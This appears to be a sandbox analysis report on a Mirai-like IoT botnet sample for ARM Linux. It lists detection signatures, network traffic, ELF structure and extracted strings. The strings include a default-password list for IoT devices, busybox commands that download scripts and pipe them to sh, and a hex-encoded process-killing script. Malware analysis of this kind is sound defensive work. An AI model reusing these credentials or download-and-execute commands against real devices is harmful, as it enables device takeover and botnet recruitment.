Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
la.bot.arm7.elf

Overview

General Information

Sample name:la.bot.arm7.elf
Analysis ID:1543060
MD5:061b963e1978b991da96aae6164a2f2d
SHA1:8839eb4dfe9022177891f9c8f11111a6c2223f0a
SHA256:167e58e111e5efb882cf0cbdff2dede657d637b419a78d31e22798bafd7feae3
Tags:elfuser-abuse_ch
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Sends malformed DNS queries
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1543060
Start date and time:2024-10-27 07:32:09 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 49s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:la.bot.arm7.elf
Detection:MAL
Classification:mal56.troj.linELF@0/0@11/0
  • VT rate limit hit for: 75cents.libre. [malformed]
  • VT rate limit hit for: ru.coziest.lol. [malformed]
Command:/tmp/la.bot.arm7.elf
PID:5515
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
thIs wEek on xLaB lEarNs nOthinG xd
Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • system is lnxubuntu20
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: la.bot.arm7.elfReversingLabs: Detection: 28%
Source: la.bot.arm7.elfString: ash|login|wget|curl|tftp|ntpdate|ftp
Source: la.bot.arm7.elfString: /proc//exe|ash|login|wget|curl|tftp|ntpdate|ftp/lib//lib64//mountinfo/fd/dev/null|/dev/consolesocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//bin//proc/net/tcp/proc/fd//proc/self/exe/. /proc//dev/watchdog/dev/misc/watchdogtelnetd|udhcpc|ntpclient|boa|httpd|mini_http|watchdog|pppdM
Source: la.bot.arm7.elfString: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var/tmp//dev//dev/shm//etc//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63\x2F\x2A\3B""\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A\x20\x20\x23\x20\x53\x6B\x69\x70\x20\x6E\x6F\x6E\x2D""\x6E\x75\x6D\x65\x72\x69\x63\x20\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73\x0A\x20\x20\x69\x66\x20\x21\x20\x5B\x20\x22\x24\x70\x69\x64\x22\x20\x2D\x65""\x71\x20\x22\x24\x70\x69\x64\x22\x20\x5D\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x63\x6F\x6E\x74""\x69\x6E\x75\x65\x0A\x20\x20\x66\x69\x0A\x0A\x20\x20\x23\x20\x47\x65\x74\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x6F\x66""\x20\x74\x68\x65\x20\x70\x72\x6F\x63\x65\x73\x73\x0A\x20\x20\x63\x6D\x64\x6C\x69\x6E\x65\x3D\x24\x28\x74\x72\x20\x27\x5C\x30\x27\x20\x27\x20\x27\x20\x3C""\x20\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x63\x6D\x64\x6C\x69\x6E\x65\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x23""\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x63\x6F\x6E\x74\x61\x69\x6E\x73\x20\x22\x64""\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x0A\x20\x20\x69\x66\x20\x65\x63\x68\x6F\x20\x22\x24\x63\x6D\x64\x6C\x69\x6E\x65\x22\x20\x7C\x20\x67\x72\x65\x70\x20\x2D""\x71\x20\x22\x64\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64""\x22\x0A\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4p

Networking

barindex
Source: global trafficTCP traffic: 103.253.147.242 ports 2,3,6,7,8,32876
Source: global trafficDNS traffic detected: malformed DNS query: nineteen.libre. [malformed]
Source: global trafficDNS traffic detected: malformed DNS query: 75cents.libre. [malformed]
Source: global trafficDNS traffic detected: malformed DNS query: ru.coziest.lol. [malformed]
Source: global trafficTCP traffic: 192.168.2.14:41496 -> 103.253.147.242:32876
Source: /tmp/la.bot.arm7.elf (PID: 5515)Socket: 127.0.0.1:1234Jump to behavior
Source: unknownUDP traffic detected without corresponding DNS query: 54.36.111.116
Source: unknownUDP traffic detected without corresponding DNS query: 130.61.64.122
Source: unknownUDP traffic detected without corresponding DNS query: 161.97.219.84
Source: unknownUDP traffic detected without corresponding DNS query: 162.243.19.47
Source: unknownUDP traffic detected without corresponding DNS query: 116.203.104.203
Source: unknownUDP traffic detected without corresponding DNS query: 54.36.111.116
Source: unknownUDP traffic detected without corresponding DNS query: 54.36.111.116
Source: unknownUDP traffic detected without corresponding DNS query: 162.243.19.47
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: global trafficDNS traffic detected: DNS query: nineteen.libre. [malformed]
Source: global trafficDNS traffic detected: DNS query: 75cents.libre. [malformed]
Source: global trafficDNS traffic detected: DNS query: ru.coziest.lol. [malformed]
Source: global trafficDNS traffic detected: DNS query: eighteen.pirate
Source: la.bot.arm7.elfString found in binary or memory: http:///curl.sh
Source: la.bot.arm7.elfString found in binary or memory: http:///wget.sh
Source: Initial sampleString containing 'busybox' found: usage: busybox
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sampleString containing 'busybox' found: /bin/busybox
Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname FICORA
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep
Source: Initial sampleString containing 'busybox' found: usage: busyboxincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne >> > upnp
Source: Initial sampleString containing 'busybox' found: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/la.bot.arm7.elf (PID: 5712)SIGKILL sent: pid: 2955, result: successfulJump to behavior
Source: classification engineClassification label: mal56.troj.linELF@0/0@11/0
Source: /tmp/la.bot.arm7.elf (PID: 5515)File opened: /proc/11/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 5515)File opened: /proc/22/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 5515)File opened: /proc/55/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 5515)File opened: /proc/66/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 5515)File opened: /proc/88/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 5515)File opened: /proc/99/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 5515)File opened: /proc/111/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 5515)File opened: /proc/222/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 5515)File opened: /proc/333/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 5515)File opened: /proc/777/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 5515)File opened: /proc/888/mapsJump to behavior
Source: submitted sampleStderr: qemu: uncaught target signal 11 (Segmentation fault) - core dumpedqemu: uncaught target signal 11 (Segmentation fault) - core dumped: exit code = 0
Source: /tmp/la.bot.arm7.elf (PID: 5515)Queries kernel information via 'uname': Jump to behavior
Source: la.bot.arm7.elf, 5515.1.00007ffde7cdd000.00007ffde7cfe000.rw-.sdmp, la.bot.arm7.elf, 5517.1.00007ffde7cdd000.00007ffde7cfe000.rw-.sdmp, la.bot.arm7.elf, 5519.1.00007ffde7cdd000.00007ffde7cfe000.rw-.sdmp, la.bot.arm7.elf, 5553.1.00007ffde7cdd000.00007ffde7cfe000.rw-.sdmp, la.bot.arm7.elf, 5710.1.00007ffde7cdd000.00007ffde7cfe000.rw-.sdmp, la.bot.arm7.elf, 5712.1.00007ffde7cdd000.00007ffde7cfe000.rw-.sdmp, la.bot.arm7.elf, 5740.1.00007ffde7cdd000.00007ffde7cfe000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/la.bot.arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/la.bot.arm7.elf
Source: la.bot.arm7.elf, 5515.1.00005643d25a8000.00005643d26f7000.rw-.sdmp, la.bot.arm7.elf, 5517.1.00005643d25a8000.00005643d26f7000.rw-.sdmp, la.bot.arm7.elf, 5519.1.00005643d25a8000.00005643d26f7000.rw-.sdmp, la.bot.arm7.elf, 5553.1.00005643d25a8000.00005643d26f7000.rw-.sdmp, la.bot.arm7.elf, 5710.1.00005643d25a8000.00005643d26f7000.rw-.sdmp, la.bot.arm7.elf, 5712.1.00005643d25a8000.00005643d26f7000.rw-.sdmp, la.bot.arm7.elf, 5740.1.00005643d25a8000.00005643d26f7000.rw-.sdmpBinary or memory string: CV!/etc/qemu-binfmt/arm
Source: la.bot.arm7.elf, 5515.1.00005643d25a8000.00005643d26f7000.rw-.sdmp, la.bot.arm7.elf, 5517.1.00005643d25a8000.00005643d26f7000.rw-.sdmp, la.bot.arm7.elf, 5519.1.00005643d25a8000.00005643d26f7000.rw-.sdmp, la.bot.arm7.elf, 5553.1.00005643d25a8000.00005643d26f7000.rw-.sdmp, la.bot.arm7.elf, 5710.1.00005643d25a8000.00005643d26f7000.rw-.sdmp, la.bot.arm7.elf, 5712.1.00005643d25a8000.00005643d26f7000.rw-.sdmp, la.bot.arm7.elf, 5740.1.00005643d25a8000.00005643d26f7000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: la.bot.arm7.elf, 5515.1.00007ffde7cdd000.00007ffde7cfe000.rw-.sdmp, la.bot.arm7.elf, 5517.1.00007ffde7cdd000.00007ffde7cfe000.rw-.sdmp, la.bot.arm7.elf, 5519.1.00007ffde7cdd000.00007ffde7cfe000.rw-.sdmp, la.bot.arm7.elf, 5553.1.00007ffde7cdd000.00007ffde7cfe000.rw-.sdmp, la.bot.arm7.elf, 5710.1.00007ffde7cdd000.00007ffde7cfe000.rw-.sdmp, la.bot.arm7.elf, 5712.1.00007ffde7cdd000.00007ffde7cfe000.rw-.sdmp, la.bot.arm7.elf, 5740.1.00007ffde7cdd000.00007ffde7cfe000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: la.bot.arm7.elf, 5517.1.00007ffde7cdd000.00007ffde7cfe000.rw-.sdmp, la.bot.arm7.elf, 5519.1.00007ffde7cdd000.00007ffde7cfe000.rw-.sdmp, la.bot.arm7.elf, 5553.1.00007ffde7cdd000.00007ffde7cfe000.rw-.sdmp, la.bot.arm7.elf, 5710.1.00007ffde7cdd000.00007ffde7cfe000.rw-.sdmp, la.bot.arm7.elf, 5740.1.00007ffde7cdd000.00007ffde7cfe000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
Path InterceptionDirect Volume Access1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1543060 Sample: la.bot.arm7.elf Startdate: 27/10/2024 Architecture: LINUX Score: 56 27 ru.coziest.lol. [malformed] 2->27 29 nineteen.libre. [malformed] 2->29 31 4 other IPs or domains 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 Connects to many ports of the same IP (likely port scanning) 2->35 9 la.bot.arm7.elf 2->9         started        signatures3 37 Sends malformed DNS queries 29->37 process4 process5 11 la.bot.arm7.elf 9->11         started        13 la.bot.arm7.elf 9->13         started        15 la.bot.arm7.elf 9->15         started        process6 17 la.bot.arm7.elf 11->17         started        19 la.bot.arm7.elf 11->19         started        21 la.bot.arm7.elf 11->21         started        process7 23 la.bot.arm7.elf 17->23         started        25 la.bot.arm7.elf 19->25         started       
SourceDetectionScannerLabelLink
la.bot.arm7.elf29%ReversingLabsLinux.Trojan.Mirai
No Antivirus matches
SourceDetectionScannerLabelLink
daisy.ubuntu.com0%VirustotalBrowse
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.25
truefalseunknown
eighteen.pirate
103.253.147.242
truetrue
    unknown
    nineteen.libre. [malformed]
    unknown
    unknowntrue
      unknown
      75cents.libre. [malformed]
      unknown
      unknowntrue
        unknown
        ru.coziest.lol. [malformed]
        unknown
        unknowntrue
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http:///wget.shla.bot.arm7.elffalse
            unknown
            http:///curl.shla.bot.arm7.elffalse
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              103.253.147.242
              eighteen.pirateSingapore
              14061DIGITALOCEAN-ASNUStrue
              130.61.64.122
              unknownUnited States
              31898ORACLE-BMC-31898USfalse
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              103.253.147.242la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                  la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                    la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                      la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                        la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                          la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                            la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                              arm7.elfGet hashmaliciousUnknownBrowse
                                la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                  130.61.64.122la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                    la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                      la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                        la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                          na.elfGet hashmaliciousUnknownBrowse
                                            na.elfGet hashmaliciousUnknownBrowse
                                              na.elfGet hashmaliciousUnknownBrowse
                                                na.elfGet hashmaliciousUnknownBrowse
                                                  na.elfGet hashmaliciousUnknownBrowse
                                                    na.elfGet hashmaliciousUnknownBrowse
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      daisy.ubuntu.comla.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                      • 162.213.35.25
                                                      kkkarm5.elfGet hashmaliciousUnknownBrowse
                                                      • 162.213.35.24
                                                      kkkarm7.elfGet hashmaliciousUnknownBrowse
                                                      • 162.213.35.24
                                                      kkkarm6.elfGet hashmaliciousUnknownBrowse
                                                      • 162.213.35.24
                                                      arm5.elfGet hashmaliciousUnknownBrowse
                                                      • 162.213.35.25
                                                      FBI.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 162.213.35.24
                                                      FBI.mips64.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 162.213.35.24
                                                      FBI.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 162.213.35.25
                                                      FBI.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 162.213.35.24
                                                      FBI.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 162.213.35.25
                                                      eighteen.piratela.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                      • 103.253.147.242
                                                      la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                      • 103.253.147.242
                                                      la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                      • 103.253.147.242
                                                      la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                      • 154.205.128.136
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      DIGITALOCEAN-ASNUSla.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                      • 103.253.147.242
                                                      la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                      • 159.65.0.147
                                                      la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                      • 64.227.183.197
                                                      http://www.wattpad.comGet hashmaliciousUnknownBrowse
                                                      • 134.122.57.34
                                                      https://pub-535a4999ab4b4c1e81647bad9b888e40.r2.dev/onedrivefresh.htmlGet hashmaliciousUnknownBrowse
                                                      • 157.230.3.230
                                                      la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                      • 167.71.216.99
                                                      la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                      • 103.253.147.242
                                                      yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                      • 165.22.45.169
                                                      la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                      • 103.253.147.242
                                                      la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                      • 188.166.237.164
                                                      ORACLE-BMC-31898USTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 158.101.44.242
                                                      JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 193.122.130.0
                                                      dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 158.101.44.242
                                                      (No subject) (92).emlGet hashmaliciousUnknownBrowse
                                                      • 192.29.14.118
                                                      Factura 1-014685.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 193.122.6.168
                                                      QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 193.122.6.168
                                                      la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                      • 134.70.38.61
                                                      la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                      • 129.147.169.37
                                                      yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                      • 147.154.3.56
                                                      la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                      • 130.61.69.123
                                                      No context
                                                      No context
                                                      No created / dropped files found
                                                      File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                      Entropy (8bit):6.027262955388443
                                                      TrID:
                                                      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                      File name:la.bot.arm7.elf
                                                      File size:100'032 bytes
                                                      MD5:061b963e1978b991da96aae6164a2f2d
                                                      SHA1:8839eb4dfe9022177891f9c8f11111a6c2223f0a
                                                      SHA256:167e58e111e5efb882cf0cbdff2dede657d637b419a78d31e22798bafd7feae3
                                                      SHA512:77e8fe64b47f341ce1059e08e47290c34268fa92f1212aecb31f36fb683853718a49d52e102d30e3b63802358679ebeacd92d4f2ffaca558508419f928d26958
                                                      SSDEEP:3072:1LkbVclrQqto5+SdWmjJ80Zx7Ydy/SQAPoQtPGxAr0h+Sxn0O0:x0clrQqtjEGTdyBNQtPGxAYhOO0
                                                      TLSH:D4A3E64AF8819A1AD5D816BEFE4F818D332367A8E3EF7203DD146B1437CA55B0A7B441
                                                      File Content Preview:.ELF..............(.........4...h.......4. ...(........p8|..8...8...................................P}..P}...............................t..........................................Q.td..................................-...L..................@-.,@...0....S

                                                      ELF header

                                                      Class:ELF32
                                                      Data:2's complement, little endian
                                                      Version:1 (current)
                                                      Machine:ARM
                                                      Version Number:0x1
                                                      Type:EXEC (Executable file)
                                                      OS/ABI:UNIX - System V
                                                      ABI Version:0
                                                      Entry Point Address:0x8194
                                                      Flags:0x4000002
                                                      ELF Header Size:52
                                                      Program Header Offset:52
                                                      Program Header Size:32
                                                      Number of Program Headers:5
                                                      Section Header Offset:99432
                                                      Section Header Size:40
                                                      Number of Section Headers:15
                                                      Header String Table Index:14
                                                      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                      NULL0x00x00x00x00x0000
                                                      .initPROGBITS0x80d40xd40x100x00x6AX004
                                                      .textPROGBITS0x80f00xf00x15bd00x00x6AX0016
                                                      .finiPROGBITS0x1dcc00x15cc00x100x00x6AX004
                                                      .rodataPROGBITS0x1dcd00x15cd00x1f500x00x2A004
                                                      .ARM.extabPROGBITS0x1fc200x17c200x180x00x2A004
                                                      .ARM.exidxARM_EXIDX0x1fc380x17c380x1180x00x82AL204
                                                      .eh_framePROGBITS0x200000x180000x40x00x3WA004
                                                      .tbssNOBITS0x200040x180040x80x00x403WAT004
                                                      .init_arrayINIT_ARRAY0x200040x180040x40x00x3WA004
                                                      .fini_arrayFINI_ARRAY0x200080x180080x40x00x3WA004
                                                      .gotPROGBITS0x200100x180100xa80x40x3WA004
                                                      .dataPROGBITS0x200b80x180b80x33c0x00x3WA004
                                                      .bssNOBITS0x203f40x183f40x70240x00x3WA004
                                                      .shstrtabSTRTAB0x00x183f40x730x00x0001
                                                      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                      EXIDX0x17c380x1fc380x1fc380x1180x1184.45620x4R 0x4.ARM.exidx
                                                      LOAD0x00x80000x80000x17d500x17d506.06700x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                                                      LOAD0x180000x200000x200000x3f40x74184.30060x6RW 0x8000.eh_frame .tbss .init_array .fini_array .got .data .bss
                                                      TLS0x180040x200040x200040x00x80.00000x4R 0x4.tbss
                                                      GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 27, 2024 07:33:22.582417965 CET4149632876192.168.2.14103.253.147.242
                                                      Oct 27, 2024 07:33:22.587730885 CET3287641496103.253.147.242192.168.2.14
                                                      Oct 27, 2024 07:33:22.587874889 CET4149632876192.168.2.14103.253.147.242
                                                      Oct 27, 2024 07:33:22.588026047 CET4149632876192.168.2.14103.253.147.242
                                                      Oct 27, 2024 07:33:22.593370914 CET3287641496103.253.147.242192.168.2.14
                                                      Oct 27, 2024 07:33:37.599950075 CET4149632876192.168.2.14103.253.147.242
                                                      Oct 27, 2024 07:33:37.608925104 CET3287641496103.253.147.242192.168.2.14
                                                      Oct 27, 2024 07:34:06.285725117 CET3287641496103.253.147.242192.168.2.14
                                                      Oct 27, 2024 07:34:06.286079884 CET4149632876192.168.2.14103.253.147.242
                                                      Oct 27, 2024 07:34:10.786139965 CET3287641496103.253.147.242192.168.2.14
                                                      Oct 27, 2024 07:34:10.786485910 CET4149632876192.168.2.14103.253.147.242
                                                      Oct 27, 2024 07:34:54.363640070 CET3287641496103.253.147.242192.168.2.14
                                                      Oct 27, 2024 07:34:54.363759995 CET4149632876192.168.2.14103.253.147.242
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 27, 2024 07:33:01.190582037 CET591025353192.168.2.1454.36.111.116
                                                      Oct 27, 2024 07:33:02.676706076 CET6016353192.168.2.148.8.8.8
                                                      Oct 27, 2024 07:33:02.676752090 CET4365053192.168.2.148.8.8.8
                                                      Oct 27, 2024 07:33:02.683988094 CET53436508.8.8.8192.168.2.14
                                                      Oct 27, 2024 07:33:02.684672117 CET53601638.8.8.8192.168.2.14
                                                      Oct 27, 2024 07:33:06.196890116 CET540705353192.168.2.14130.61.64.122
                                                      Oct 27, 2024 07:33:11.197981119 CET6060253192.168.2.14161.97.219.84
                                                      Oct 27, 2024 07:33:11.403600931 CET5360602161.97.219.84192.168.2.14
                                                      Oct 27, 2024 07:33:11.404818058 CET411755353192.168.2.14162.243.19.47
                                                      Oct 27, 2024 07:33:16.411154985 CET3764353192.168.2.14116.203.104.203
                                                      Oct 27, 2024 07:33:16.423258066 CET5337643116.203.104.203192.168.2.14
                                                      Oct 27, 2024 07:33:16.424355030 CET6053953192.168.2.1454.36.111.116
                                                      Oct 27, 2024 07:33:16.432512045 CET377775353192.168.2.1454.36.111.116
                                                      Oct 27, 2024 07:33:21.439856052 CET3836053192.168.2.148.8.8.8
                                                      Oct 27, 2024 07:33:21.446882963 CET53383608.8.8.8192.168.2.14
                                                      Oct 27, 2024 07:33:21.448448896 CET3749053192.168.2.148.8.8.8
